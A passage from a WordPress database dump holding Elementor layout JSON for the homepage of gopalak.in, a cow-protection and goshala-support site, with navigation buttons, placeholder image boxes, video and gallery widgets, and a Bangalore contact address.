us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9916,1663,'_elementor_page_assets','a:0:{}'),(9918,1664,'_elementor_edit_mode','builder'),(9919,1664,'_elementor_template_type','wp-page'),(9920,1664,'_elementor_version','3.7.8'),(9921,1664,'_wp_page_template','elementor_canvas'),(9922,1664,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"9\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 